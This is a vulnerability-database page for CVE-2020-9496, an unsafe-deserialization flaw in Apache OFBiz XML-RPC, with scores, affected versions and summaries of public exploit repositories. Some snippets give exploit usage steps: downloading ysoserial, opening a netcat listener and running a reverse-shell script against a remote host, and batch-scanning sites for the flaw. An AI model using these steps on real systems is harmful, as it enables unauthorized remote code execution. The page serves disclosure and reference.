
CVE-2020-9496

Published: 15/07/2020 Updated: 07/11/2023
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
CVSS v3 Base Score: 6.1 | Impact Score: 2.7 | Exploitability Score: 2.8
VMScore: 386
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Vulnerability Summary

XML-RPC requests are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03.

Vulnerable Product

apache ofbiz 17.12.03

Exploits

Apache OfBiz version 17.12.01 exploit that achieves remote command execution via unsafe deserialization of XMLRPC arguments ...

Github Repositories

XML-RPC requests are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03

CVE-2020-9496 XML-RPC requests are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03. Install requirements: $ pip install -r requirements.txt $ wget jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O ysoserial.jar Usage: $ python cve-2020-9496.py --targ

GUI Exploit Tool For RedTeam

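0x00 Introduction A GUI exploitation tool that mainly assists red teams with exploitation in complex attack scenarios, such as some non-HTTP protocols and asynchronous vulnerability exploitation. This version was developed in some haste and will be iterated on frequently. Currently supported vulnerabilities: Fastjson vulnerability with response echo, Jmxrmi vulnerability with response echo, RmiServer vulnerability with response echo, ApacheOfbiz exploitation with response echo (CVE-2021-26295, CVE-2020-9496)

CVE-2020-9496 Because the 2 xmlrpc related requests in webtools (xmlrpc and ping) are not using authentication, they are vulnerable to unsafe deserialization. This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team. Affected Version: 17.12.01 Fixed Versions: 18.12.01, 17.12.04 Original Blog: securitylab.github.com/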

CVE-2020-9496 manual exploit

CVE-2020-9496 - RCE Because the 2 xmlrpc related requests in webtools (xmlrpc and ping) are not using authentication, they are vulnerable to unsafe deserialization. This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team. This vulnerability exists due to Java serialization issues when processing requests sent to /webtool

Apache OFBiz unsafe deserialization of XMLRPC arguments

CVE-2020-9496 - RCE Because the 2 xmlrpc related requests in webtools (xmlrpc and ping) are not using authentication, they are vulnerable to unsafe deserialization. This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team. This vulnerability exists due to Java serialization issues when processing requests sent to /webtool

apache-ofbiz-CVE-2020-9496 Youtube: www.youtube.com/watch?v=DO93Xc8sGWg

HackTheBox-Monitors Writeup RFI-SQLi-Deserialization-DockerEscape Synopsis: “Monitors” is marked as a hard difficulty Linux machine that features an Apache service hosting a WordPress website. The HTML source reveals a WordPress plugin that is vulnerable to RFI (Remote File Inclusion). Using this vulnerability we read configuration file of Wordpress and apache, the former

CVE-2020-9496 Set-up Vulnerable Environment
▶ wget archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip
▶ unzip apache-ofbiz-17.12.01.zip
▶ cd apache-ofbiz-17.12.01
▶ sh gradle/init-gradle-wrapper.sh
▶ ./gradlew cleanAll loadDefault
▶ ./gradlew "ofbiz --load-data readers=seed,seed-initial,ext"
▶ ./gradlew ofbiz # Start OFBiz

PoC and exploit for batch verification of CVE-2020-9496 and CVE-2021-26295 using dnslog

ofbiz-poc PoC and exploit for batch verification of CVE-2020-9496 and CVE_2020_9496 using dnslog. OFBiz_CVE_2020_9496.py and OFBiz_CVE_2021_26295.py each verify a single vulnerability; ofbiz_poc.py batch-verifies both vulnerabilities, with the sites to be verified saved in urls.txt. For reproduction of the vulnerabilities, see: yuaneuro.cn/archives/ofbiz.html

ApacheOfBiz 17.12.01 - Unauthorized Remote Code Execution

CVE-2020-9496 ApacheOfBiz 17.12.01 - Unauthorized Remote Code Execution. XML-RPC requests are vulnerable to unsafe deserialization. Steps Step 1: pip3 install -r requeriments.txt Step 2: nc -nlvp <port> # attack computer Step 3: python3 shell.py -i <remote IP> -p <remote port> -li <local IP> -lp <local port&

Articles accumulated by the 360Quake team.

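Papers: Articles accumulated by the 360Quake team quake.360.cn/quake/#/report
Title, Date
A brief analysis of CobaltStrike phishing site detection, 2021-06-11
A brief analysis of Cobalt Strike Team Server scanning, 2021-04-15
A brief analysis of open-source honeypot identification, 2020-12-18
SolarWinds compromised server mapping and analysis report, 2020-12-16
TLS server-side tagging, 2020-12-14
TLS server-side tagging using JARM fingerprints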